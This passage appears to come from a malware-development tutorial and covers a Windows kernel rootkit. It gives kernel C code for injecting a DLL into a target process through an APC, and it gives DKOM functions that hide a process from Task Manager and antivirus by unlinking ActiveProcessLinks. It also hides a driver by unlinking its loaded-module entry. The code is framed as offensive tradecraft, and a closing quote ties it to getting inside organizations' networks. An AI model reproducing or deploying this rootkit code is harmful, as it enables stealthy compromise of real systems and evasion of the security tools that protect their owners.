function serves the critical role of injecting a DLL into a target process in kernel mode. It accepts several parameters, including the ProcessId
of the target process, the PEPROCESS
structure of the target process (Peprocess
), the PETHREAD
structure of the target process (Pethread
), and a Boolean value indicating whether alertable I/O is allowed (Alert
).
The injection process begins with the opening of the target process using ZwOpenProcess
. This step grants us access to the target process with full privileges.
Subsequently, we allocate virtual memory within the target process using ZwAllocateVirtualMemory
. This allocated memory will be used to store the path to the DLL that we intend to inject.
To safely write data into the target process’s memory, we attach to the target process using KeStackAttachProcess
. This attachment is crucial for the integrity and safety of the DLL injection process.
With the attachment in place, we copy the path of the DLL to be injected into the allocated virtual memory within the target process. This path is defined in the DllFormatPath
variable.
After successfully copying the DLL path, we detach from the target process using KeUnstackDetachProcess
.
The heart of the DLL injection lies in the creation of an Asynchronous Procedure Call (APC). This is accomplished by allocating memory for the APC using ExAllocatePool
. The APC is initialized with the necessary routine and parameters.
- The Apc structure is initialized using KeInitializeApc.
- The parameters include the target thread (Pethread) and an APC routine (APCKernelRoutine) responsible for loading the DLL.
- Additionally, the normal routine is specified as Hash.pvLoadLibraryExA to load the DLL using LoadLibraryExA from kernel32.dll.
- The APC is inserted into the thread’s queue with KeInsertQueueApc.
To ensure that DLL injection occurs in a controlled and synchronized manner, we rely on the SirifefWorkerRoutine
and APCInjectorRoutine
functions.
VOID SirifefWorkerRoutine(PVOID Context)
{
DllInject(((PSIRIFEF_INJECTION_DATA)Context)->ProcessId, ((PSIRIFEF_INJECTION_DATA)Context)->Process, ((PSIRIFEF_INJECTION_DATA)Context)->Ethread, FALSE);
KeSetEvent(&((PSIRIFEF_INJECTION_DATA)Context)->Event, (KPRIORITY)0, FALSE);
return;
}
The SirifefWorkerRoutine function acts as a worker routine responsible for triggering the DLL injection. It accepts a single Context parameter.
Within this function, the actual DLL injection is initiated by calling the DllInject function. The parameters provided include the target process’s ID, the process’s EPROCESS structure, and the process’s ETHREAD structure. The final parameter, FALSE, indicates that alertable I/O is not allowed.
Once DllInject returns, the routine calls KeSetEvent to signal that the injection attempt has finished. This event lets the code that queued the work item wait for completion before it continues.
DLL Injection via APC
DLL injection is initiated within the APCInjectorRoutine function, which serves as the orchestrator for the whole process. It begins by initializing a SIRIFEF_INJECTION_DATA structure, Sf, and queuing a work item that runs SirifefWorkerRoutine on a system worker thread to perform the injection.
VOID NTAPI APCInjectorRoutine(PKAPC Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *SystemArgument1, PVOID *SystemArgument2, PVOID* Context)
{
SIRIFEF_INJECTION_DATA Sf;
RtlSecureZeroMemory(&Sf, sizeof(SIRIFEF_INJECTION_DATA));
ExFreePool(Apc);
// Initialize the SIRIFEF_INJECTION_DATA structure with the necessary information
Sf.Ethread = KeGetCurrentThread();
Sf.Process = IoGetCurrentProcess();
Sf.ProcessId = PsGetCurrentProcessId();
// Initialize an event to synchronize the DLL injection
KeInitializeEvent(&Sf.Event, NotificationEvent, FALSE);
// Initialize a work item to execute the SirifefWorkerRoutine
ExInitializeWorkItem(&Sf.WorkItem, (PWORKER_THREAD_ROUTINE)SirifefWorkerRoutine, &Sf);
// Queue the work item to be executed on the DelayedWorkQueue
ExQueueWorkItem(&Sf.WorkItem, DelayedWorkQueue);
// Wait for the DLL injection to complete
KeWaitForSingleObject(&Sf.Event, Executive, KernelMode, TRUE, 0);
return;
}
These routines work together to schedule and execute the DLL injection into the target process after the kernel32.dll module is loaded.
Hide Process
An interesting technique we can use in our rootkit is to hide, or unlink, a target process. Once unlinked, the process no longer appears in the Windows Task Manager and is missed by any tool, AVs included, that relies on the same process list.
To hide our process we need to understand a few Windows internal concepts, such as the EPROCESS data structure. EPROCESS is an opaque data structure in the Windows kernel that contains important information about processes running on the system. The offsets within this large structure change from one Windows build or version to another.
What we’re interested in is ActiveProcessLinks, a LIST_ENTRY structure embedded in EPROCESS. Because EPROCESS is opaque, we can’t simply write EPROCESS.ActiveProcessLinks; we have to use PsGetCurrentProcess to get the current EPROCESS and then add a version-dependent offset. This is the downside of the EPROCESS structure: it makes it very hard to write a Windows kernel rootkit that stays compatible across versions.
kd> dt nt!_EPROCESS
<..redacted...>
+0x000 Pcb : _KPROCESS
+0x3e8 ProcessLock : _EX_PUSH_LOCK
+0x2f0 UniqueProcessId : Ptr64 Void
+0x400 ActiveProcessLinks : _LIST_ENTRY
The LIST_ENTRY data structure is a node in a doubly-linked list, where FLINK (forward link) and BLINK (backward link) are references to the next and previous elements in the list.
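To make the embedded-node idea concrete, here is a minimal user-mode sketch in plain C. Everything in it is an assumption made for illustration: mock_process is a made-up record and not the real EPROCESS layout, list_entry only mirrors the two-pointer shape of LIST_ENTRY, and CONTAINER_OF is a local macro that performs the same pointer arithmetic as the kernel’s CONTAINING_RECORD. It shows how a list walk over embedded links gets back to the enclosing record by subtracting the member’s offset.

```c
#include <assert.h>
#include <stddef.h>

/* User-mode stand-in for LIST_ENTRY (same two-pointer shape). */
typedef struct list_entry {
    struct list_entry *Flink; /* next element */
    struct list_entry *Blink; /* previous element */
} list_entry;

/* Hypothetical mock record; NOT the real EPROCESS layout. */
typedef struct mock_process {
    unsigned long pid;
    char name[16];
    list_entry links; /* embedded node, playing the role of ActiveProcessLinks */
} mock_process;

/* Recover the enclosing structure from a pointer to its embedded member,
   the same arithmetic that CONTAINING_RECORD performs. */
#define CONTAINER_OF(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Make a list head point to itself (an empty circular list). */
void list_init(list_entry *head) {
    head->Flink = head;
    head->Blink = head;
}

/* Insert entry just before head, i.e. at the tail of the circular list. */
void list_insert_tail(list_entry *head, list_entry *entry) {
    assert(head != NULL && entry != NULL);
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}

/* Walk forward from head and return the record with the given pid, or NULL. */
mock_process *find_by_pid(list_entry *head, unsigned long pid) {
    for (list_entry *e = head->Flink; e != head; e = e->Flink) {
        mock_process *p = CONTAINER_OF(e, mock_process, links);
        if (p->pid == pid)
            return p;
    }
    return NULL;
}
```

The walk only ever sees list_entry pointers; the record itself is found by subtracting the offset of links. That is why a changed offset between builds breaks code that hard-codes it.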
Using the information above, we can hide our process from being shown by manipulating the kernel data structures. To hide our process we can do the following:
- Point the ActiveProcessLinks.FLINK of EPROCESS 1 to the ActiveProcessLinks of EPROCESS 3.
- Point the ActiveProcessLinks.BLINK of EPROCESS 3 to the ActiveProcessLinks of EPROCESS 1.
This manipulation unlinks the data structure of our target process, EPROCESS 2, from the doubly-linked list, rendering it invisible to anything that enumerates processes by walking this list.
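The two pointer updates are ordinary doubly-linked list removal, which can be tried safely in user mode. The sketch below is an illustration under stated assumptions, not kernel code: mock_process, link_all, unlink_entry, count_visible, and is_visible are all hypothetical names, and the three records stand in for EPROCESS 1, 2, and 3.

```c
#include <assert.h>
#include <stddef.h>

/* User-mode stand-in for LIST_ENTRY. */
typedef struct list_entry {
    struct list_entry *Flink, *Blink;
} list_entry;

/* Hypothetical mock record; NOT the real EPROCESS layout. */
typedef struct mock_process {
    unsigned long pid;
    list_entry links;
} mock_process;

/* Link an array of records into one circular doubly-linked list. */
void link_all(mock_process *procs, size_t count) {
    assert(procs != NULL && count > 0);
    for (size_t i = 0; i < count; i++) {
        procs[i].links.Flink = &procs[(i + 1) % count].links;
        procs[i].links.Blink = &procs[(i + count - 1) % count].links;
    }
}

/* Remove entry from the list by making its neighbours point past it. */
void unlink_entry(list_entry *entry) {
    list_entry *prev = entry->Blink;
    list_entry *next = entry->Flink;
    prev->Flink = next; /* record 1 now points forward to record 3 */
    next->Blink = prev; /* record 3 now points back to record 1 */
}

/* Count records reachable by following Flink from start, start included. */
size_t count_visible(const list_entry *start) {
    size_t n = 1;
    for (const list_entry *e = start->Flink; e != start; e = e->Flink)
        n++;
    return n;
}

/* Return 1 if a record with this pid is reachable from start, else 0. */
int is_visible(const list_entry *start, unsigned long pid) {
    const list_entry *e = start;
    do {
        const mock_process *p = (const mock_process *)
            ((const char *)e - offsetof(mock_process, links));
        if (p->pid == pid)
            return 1;
        e = e->Flink;
    } while (e != start);
    return 0;
}
```

With three linked records, calling unlink_entry on the middle one makes count_visible drop from 3 to 2 while the record itself stays in memory untouched. Only list walkers lose sight of it.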
// Function to hide a process by manipulating kernel data structures
NTSTATUS HideProcess(ULONG pid) {
PEPROCESS currentEProcess = PsGetCurrentProcess();
LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;
// Get the offsets for UniqueProcessId and ActiveProcessLinks
ULONG uniqueProcessIdOffset = FIELD_OFFSET(EPROCESS, UniqueProcessId);
ULONG activeProcessLinksOffset = FIELD_OFFSET(EPROCESS, ActiveProcessLinks);
ULONG currentPid;
do {
// Check if the current process ID is the one to hide
RtlCopyMemory(&currentPid, (PUCHAR)currentEProcess + uniqueProcessIdOffset, sizeof(currentPid));
if (currentPid == pid) {
// Remove the process from the list
LIST_ENTRY* blink = currentList->Blink;
LIST_ENTRY* flink = currentList->Flink;
blink->Flink = flink;
flink->Blink = blink;
return STATUS_SUCCESS;
}
// Move to the next process
currentList = currentList->Flink;
currentEProcess = CONTAINING_RECORD(currentList, EPROCESS, ActiveProcessLinks);
} while (currentList != &currentEProcess->ActiveProcessLinks);
return STATUS_NOT_FOUND; // Process not found
}
The HideProcess function hides a process using the Direct Kernel Object Manipulation (DKOM) technique. It takes the Process ID (PID) of the target process as an argument. Here’s how it works:
- It starts by calling PsGetCurrentProcess to obtain the EPROCESS structure of the process in whose context the driver code is running.
- The code then retrieves the offsets within the EPROCESS structure for UniqueProcessId and ActiveProcessLinks.
- It iterates through the list of active processes, comparing the PID of each process with the target PID. When it finds a match, it unlinks the process from the ActiveProcessLinks list, effectively hiding it.
- The function returns STATUS_SUCCESS if it successfully hides the process. If the target process is not found, it returns STATUS_NOT_FOUND.
Hiding a Driver
In addition to hiding processes, we can also employ the DKOM technique to hide drivers from the system. This is particularly useful in scenarios where a rootkit needs to remain undetected.
// Function to hide a driver by manipulating data structures
NTSTATUS HideDriver(PDRIVER_OBJECT driverObject) {
KIRQL irql;
// Raise IRQL to DPC level
irql = KeRaiseIrqlToDpcLevel();
// Get the module entry from the DriverObject
PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)driverObject->DriverSection;
// Unlink the module entry
moduleEntry->InLoadOrderLinks.Blink->Flink = moduleEntry->InLoadOrderLinks.Flink;
moduleEntry->InLoadOrderLinks.Flink->Blink = moduleEntry->InLoadOrderLinks.Blink;
// Lower IRQL back to its original value
KeLowerIrql(irql);
return STATUS_SUCCESS;
}
The HideDriver function is designed to hide a driver by manipulating kernel data structures. Here’s a breakdown of how it works:
- It raises the IRQL (Interrupt Request Level) to DPC (Deferred Procedure Call) level using KeRaiseIrqlToDpcLevel. This keeps the current processor from being preempted while the list is modified; it does not by itself stop other processors from touching the same list.
- Next, it obtains the module entry by casting the DriverSection member of the provided driverObject to a PLDR_DATA_TABLE_ENTRY. This provides access to information about the driver module.
- It unlinks the module entry from the kernel’s internal linked lists. By manipulating the InLoadOrderLinks member of the module entry, it effectively removes the driver from the list of loaded modules.
- Finally, it lowers the IRQL back to its original value using KeLowerIrql, allowing normal system operation to resume.
END
And that’s it! We’ve explored the essentials of malware development and offensive tradecraft. Thank you for reading, and I hope you’ve learned something valuable from this article. We’ve covered a wide range of topics, from dynamic function loading and process injection to advanced techniques like rootkits and Direct Kernel Object Manipulation (DKOM). I intentionally removed the shellcode development section to keep things simpler, but I may cover it in a separate article.
Throughout this article, I’ve included references to some great resources that helped shape it. If you’re eager to dive deeper, I encourage you to explore them and continue building your skills.
‘Social engineering and phishing, combined with some operative knowledge about Windows hacking, should be enough to get you inside the networks of most organizations.’
References and Credits
- Anatomy of the Process Environment Block (PEB) (Windows Internals)
- Manipulating Active processlinks
- DLL Injection
- Kernel Mode Rootkits
- Enumerating RWX Protected Memory Regions for Code Injection
- Windows APT Warfare